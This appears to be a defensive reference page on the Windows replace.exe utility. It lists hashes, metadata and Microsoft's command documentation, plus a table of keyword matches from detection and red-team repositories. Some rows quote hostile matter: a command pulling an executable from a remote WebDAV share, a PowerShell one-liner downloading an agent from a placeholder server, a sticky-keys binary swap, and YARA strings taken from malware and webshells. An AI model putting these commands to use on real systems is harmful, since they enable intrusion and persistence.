replace.exe

  • File Path: C:\windows\system32\replace.exe
  • Description: Replace File Utility

Hashes

Type Hash
MD5 0F76F00192C4300413049BFE79491D87
SHA1 012126E22C4DD3A6517B29A2CD9C55C59C03169C
SHA256 753A788019F5A1050ACCB74A21E7029451F41477493C74D1BCC21F2D16A3A85B
SHA384 423F6894DD4F170E98FE88596E0747D7FDEEA12F79CD2A77519CB6D8F42C60C61AE72E99F4D52C3FA601EC5F6ED6629B
SHA512 D9E4266EC0E6E07EBE3DEBDB4BD3776496762AB6738B9D64590CDD43A90F660C7F1297533DE0A0BE21DCF085A109C5FD9B26508EBE3B6C701A2607D10BFA2CFE
SSDEEP 384:5QvkhX6tT4wH6ezNbrfi/QS83l+NL0k4bc1Woh/W:OvkhXST4wzJfit83OkbcB

Signature

  • Status: The file C:\windows\system32\replace.exe carries no embedded Authenticode signature, which the scanner reports as "not digitally signed". Windows inbox binaries are normally signed through security catalogs (%SystemRoot%\System32\CatRoot) rather than with an embedded signature, so verify the catalog signature (for example with Sysinternals sigcheck, which consults the catalogs) and compare the hashes above against a known-good copy of the same build before treating the missing signature as suspicious.
  • Serial:
  • Thumbprint:
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: REPLACE.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table lists examples of replace.exe being misused. While replace.exe is not inherently malicious, its legitimate functionality can be abused: the LOLBAS entry (Replace.yml) and the Sigma rule proc_creation_win_lolbas_replace.yml describe its use to copy an attacker-supplied file from a remote share (for example a WebDAV host) into a local directory with the /A switch. The rows are keyword matches for "replace" across public detection and offensive-security repositories, so most of them (PowerShell -replace, JavaScript .replace(), MITRE ATT&CK technique descriptions) refer to the word rather than to this binary and are not evidence about replace.exe itself.

Source | Source File | Example | License
--- | --- | --- | ---
sigma | gcp_kubernetes_admission_controller.yml | - replace | DRL 1.0
sigma | cisco_cli_moving_data.yml | - 'configure replace' | DRL 1.0
sigma | posh_ps_susp_wallpaper.yml | title: Replace Desktop Wallpaper by Powershell | DRL 1.0
sigma | proc_creation_win_lolbas_replace.yml | title: Suspicious Replace.exe Execution | DRL 1.0
sigma | proc_creation_win_lolbas_replace.yml | description: Replace.exe is used to replace file with another file | DRL 1.0
sigma | proc_creation_win_lolbas_replace.yml | - https://lolbas-project.github.io/lolbas/Binaries/Replace/ | DRL 1.0
sigma | proc_creation_win_lolbas_replace.yml | - 'replace ' | DRL 1.0
LOLBAS | AcroRd32.yml | - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary |
LOLBAS | ROCCAT_Swarm.yml | - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe |
LOLBAS | Replace.yml | Name: Replace.exe |
LOLBAS | Replace.yml | Description: Used to replace file with another file |
LOLBAS | Replace.yml | - Command: replace.exe C:\Source\File.cab C:\Destination /A |
LOLBAS | Replace.yml | - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A |
LOLBAS | Replace.yml | - Path: C:\Windows\System32\replace.exe |
LOLBAS | Replace.yml | - Path: C:\Windows\SysWOW64\replace.exe |
LOLBAS | Replace.yml | - IOC: Replace.exe retrieving files from remote server |
malware-ioc | misp_invisimole.json | "description": "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", | © ESET 2014-2018
malware-ioc | nouns.txt | replace | © ESET 2014-2018
malware-ioc | stantinko | var c = a[b].toLocaleLowerCase().replace(/(\n)/g, " ").replace(/(\r)/g, ""); | © ESET 2014-2018
malware-ioc | stantinko | a = a.toLowerCase().replace(/(\n)/g, " ").replace(/(\r)/g, ""); | © ESET 2014-2018
malware-ioc | misp-turla-outlook-event.json | "description": "The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.[[Citation: Microsoft Component Object Model]] Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[[Citation: GDATA COM Hijacking]] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.\n\nDetection: There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.[[Citation: Endgame COM Hijacking]] Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10\n\nData Sources: Windows Registry, DLL monitoring, Loaded DLLs\n\nContributors: ENDGAME", | © ESET 2014-2018
malware-ioc | windigo | replace: | © ESET 2014-2018
atomic-red-team | problem_report.md | ℹ Please replace this with what you did. | MIT License. © 2018 Red Canary
atomic-red-team | problem_report.md | ℹ Please replace this with what you expected to happen. | MIT License. © 2018 Red Canary
atomic-red-team | problem_report.md | ℹ Please replace this with of what happened instead. | MIT License. © 2018 Red Canary
atomic-red-team | index.md | - Atomic Test #2: Replace binary of sticky keys [windows] | MIT License. © 2018 Red Canary
atomic-red-team | index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary
atomic-red-team | index.md | - Atomic Test #1: Replace Desktop Wallpaper [windows] | MIT License. © 2018 Red Canary
atomic-red-team | linux-index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary
atomic-red-team | macos-index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary
atomic-red-team | windows-index.md | - Atomic Test #2: Replace binary of sticky keys [windows] | MIT License. © 2018 Red Canary
atomic-red-team | windows-index.md | - Atomic Test #1: Replace Desktop Wallpaper [windows] | MIT License. © 2018 Red Canary
atomic-red-team | T1003.md | $cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy','' | MIT License. © 2018 Red Canary
atomic-red-team | T1053.003.md | - Atomic Test #1 - Cron - Replace crontab with referenced file | MIT License. © 2018 Red Canary
atomic-red-team | T1053.003.md | ## Atomic Test #1 - Cron - Replace crontab with referenced file | MIT License. © 2018 Red Canary
atomic-red-team | T1070.006.md | | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | MIT License. © 2018 Red Canary
atomic-red-team | T1098.md | $account = $member.Name -replace ".+\","" # strip computername\ | MIT License. © 2018 Red Canary
atomic-red-team | src | - If Excel asks "A file name '…' already exists in this location. Do you want to replace it?", click Yes. | MIT License. © 2018 Red Canary
atomic-red-team | T1204.002.md | $macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', "#{file_name}" | MIT License. © 2018 Red Canary
atomic-red-team | T1221.md | Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft's Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) | MIT License. © 2018 Red Canary
atomic-red-team | T1491.001.md | - Atomic Test #1 - Replace Desktop Wallpaper | MIT License. © 2018 Red Canary
atomic-red-team | T1491.001.md | ## Atomic Test #1 - Replace Desktop Wallpaper | MIT License. © 2018 Red Canary
atomic-red-team | T1546.008.md | - Atomic Test #2 - Replace binary of sticky keys | MIT License. © 2018 Red Canary
atomic-red-team | T1546.008.md | ## Atomic Test #2 - Replace binary of sticky keys | MIT License. © 2018 Red Canary
atomic-red-team | T1546.008.md | Replace sticky keys binary (sethc.exe) with cmd.exe | MIT License. © 2018 Red Canary
atomic-red-team | T1546.015.md | Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. | MIT License. © 2018 Red Canary
atomic-red-team | T1547.009.md | Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. | MIT License. © 2018 Red Canary
atomic-red-team | T1558.001.md | "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat | MIT License. © 2018 Red Canary
atomic-red-team | T1558.001.md | "@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat | MIT License. © 2018 Red Canary
atomic-red-team | T1564.md | $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" | MIT License. © 2018 Red Canary
atomic-red-team | T1574.001.md | If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. | MIT License. © 2018 Red Canary
signature-base | apt_apt29_grizzly_steppe.yar (https://github.com/Neo23x0/signature-base/blob/master/yara/apt_apt29_grizzly_steppe.yar) | $s2 = "Repeat last find command)Replace specific text with different text" fullword wide | CC BY-NC 4.0
signature-base | apt_hafnium.yar | $s3 = "Encoding.UTF8.GetString(FromBase64String(str.Replace(" ascii | CC BY-NC 4.0
signature-base | apt_oilrig.yar | $x1 = "Get-Content $env:Public\Libraries\update.vbs) -replace" ascii | CC BY-NC 4.0
signature-base | apt_oilrig.yar | $x3 = "CreateObject("WScript.Shell").Run Replace(DownloadExecute,"-","bat")" fullword ascii | CC BY-NC 4.0
signature-base | apt_oilrig.yar | $s4 = "') -replace '',('DNS'+$id) | " fullword ascii | CC BY-NC 4.0
signature-base | apt_oilrig.yar | $s7 = "') -replace '',('HTP'+$id) | " fullword ascii | CC BY-NC 4.0
signature-base | apt_oilrig.yar | $x1 = "wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace '_',(Get-Random) | Set-C" ascii | CC BY-NC 4.0
signature-base | apt_oilrig.yar | $x1 = "(Get-Content $env:Public\Libraries\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\Libraries\dns.ps1" fullword ascii | CC BY-NC 4.0
signature-base | apt_oilrig.yar | $one5 = "cu = Replace(cu, "$", "")" ascii wide | CC BY-NC 4.0
signature-base | apt_winnti_hdroot.yar | $s8 = "tera replace dll config" fullword ascii | CC BY-NC 4.0
signature-base | cn_pentestset_webshells.yar | $s2 = "strReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW" fullword ascii | CC BY-NC 4.0
signature-base | crime_emotet.yar | note = "The binary will replace the original emotet by copying it to a quarantine. It also contains a routine to perform a self-deinstallation on the 25th of April 2021. The three-month timeframe between rollout and self-deinstallation was chosen primarily for evidence purposes as well as to allow remediation." | CC BY-NC 4.0
signature-base | crime_goldeneye.yar | $x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii | CC BY-NC 4.0
signature-base | gen_cert_payloads.yar | $fp1 = "replace it with the PEM-encoded root certificate" | CC BY-NC 4.0
signature-base | gen_fireeye_redteam_tools.yar | $s2 = "[1].replace('unsigned char buf[] = "'" | CC BY-NC 4.0
signature-base | gen_invoke_thehash.yar | $s1 = "$process_ID = $process_ID -replace "-00-00","" " fullword ascii | CC BY-NC 4.0
signature-base | gen_mimikatz.yar | $x9 = "\ Password replace ->" fullword wide ascii | CC BY-NC 4.0
signature-base | gen_powershell_empire.yar | $s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', "$PersistenceScriptName -Persist")" fullword ascii | CC BY-NC 4.0
signature-base | gen_susp_js_obfuscatorio.yar | $c4 = ")'replace';var" | CC BY-NC 4.0
signature-base | gen_webshells.yar | $gen_bit_sus2 = /.replace(\/\w\/g/ nocase wide ascii | CC BY-NC 4.0
signature-base | gen_webshells.yar | $m_multi_one1 = "Replace(" wide ascii | CC BY-NC 4.0
signature-base | gen_webshells.yar | $m_multi_four2 = ".Replace(" wide ascii | CC BY-NC 4.0
signature-base | gen_webshells.yar | $oo2 = "/").Replace("/" wide ascii | CC BY-NC 4.0
signature-base | gen_webshells.yar | $asp_gen_sus2 = /.replace(\/\w\/g/ nocase wide ascii | CC BY-NC 4.0
signature-base | thor-webshells.yar | $s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),"//",""""),"\*\",vbCrlf)" fullword | CC BY-NC 4.0
signature-base | thor-webshells.yar | $s4 = "echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace" | CC BY-NC 4.0
signature-base | thor-webshells.yar | $s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)" | CC BY-NC 4.0
signature-base | thor-webshells.yar | $s3 = "echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace" | CC BY-NC 4.0
signature-base | thor-webshells.yar | $s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)" | CC BY-NC 4.0
signature-base | thor-webshells.yar | $s3 = "If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "
")" | CC BY-NC 4.0
signature-base | thor-webshells.yar | $s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")" | CC BY-NC 4.0
signature-base | thor-webshells.yar | $s8 = "Obviously you replace the ip address with that of the target." | CC BY-NC 4.0
stockpile | 3734aa1e-c536-42b3-8912-4c91b8bdce90.yml | ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("""","")) | Apache-2.0 (https://github.com/mitre/stockpile/blob/master/LICENSE)
stockpile (https://github.com/mitre/stockpile) | 52771610-2322-44cf-816b-a7df42b4c086.yml (https://github.com/mitre/stockpile/blob/master/data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml) | name: Replace a service binary with alternate binary | Apache-2.0 (https://github.com/mitre/stockpile/blob/master/LICENSE)
stockpile (https://github.com/mitre/stockpile) | e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml (https://github.com/mitre/stockpile/blob/master/data/abilities/privilege-escalation/e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml) | $url="#{server}/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("""",""); [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data); | Apache-2.0
stockpile | e99cce5c-cb7e-4a6e-8a09-1609a221b90a.yml | $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("""",""); | Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


replace

Replace existing files in a directory. If used with the /a option, this command adds new files to a directory instead of replacing existing files.

Syntax

replace [<drive1>:][<path1>]<filename> [<drive2>:][<path2>] [/a] [/p] [/r] [/w]
replace [<drive1>:][<path1>]<filename> [<drive2>:][<path2>] [/p] [/r] [/s] [/w] [/u]

Parameters

Parameter Description
[<drive1>:][<path1>]<filename> Specifies the location and name of the source file or set of files. The filename option is required, and can include wildcard characters (* and ?).
[<drive2>:][<path2>] Specifies the location of the destination file. You can’t specify a file name for files you replace. If you don’t specify a drive or path, this command uses the current drive and directory as the destination.
/a Adds new files to the destination directory instead of replacing existing files. You can’t use this command-line option with the /s or /u command-line option.
/p Prompts you for confirmation before replacing a destination file or adding a source file.
/r Replaces Read-only and unprotected files. If you attempt to replace a Read-only file, but you don’t specify /r, an error results and stops the replacement operation.
/w Waits for you to insert a disk before the search for source files begins. If you don’t specify /w, this command begins replacing or adding files immediately after you press ENTER.
/s Searches all subdirectories in the destination directory and replaces matching files. You can’t use /s with the /a command-line option. The command doesn’t search subdirectories that are specified in Path1.
/u Replaces only those files on the destination directory that are older than those in the source directory. You can’t use /u with the /a command-line option.
/? Displays help at the command prompt.
Remarks
  • As this command adds or replaces files, the file names appear on the screen. After this command is done, a summary line is displayed in one of the following formats:

    nnn files added
    nnn files replaced
    no file added
    no file replaced
    
  • If you’re using floppy disks and you need to switch disks while running this command, you can specify the /w command-line option so that this command waits for you to switch the disks.

  • You can’t use this command to update hidden files or system files.

  • The following table shows each exit code and a brief description of its meaning:

    Exit code Description
    0 This command successfully replaced or added the files.
    1 This command encountered an incorrect version of MS-DOS.
    2 This command couldn’t find the source files.
    3 This command couldn’t find the source or destination path.
    5 The user doesn’t have access to the files that you want to replace.
    8 There is insufficient system memory to carry out the command.
    11 The user used the wrong syntax on the command line.

Note: You can use the ERRORLEVEL parameter on the if command line in a batch program to process exit codes that are returned by this command.

Examples

To update all the versions of a file named Phones.cli (which appear in multiple directories on drive C:), with the latest version of the Phones.cli file from a floppy disk in drive A:, type:

replace a:\phones.cli c:\ /s

MIT License. Copyright (c) 2020-2021 Strontic.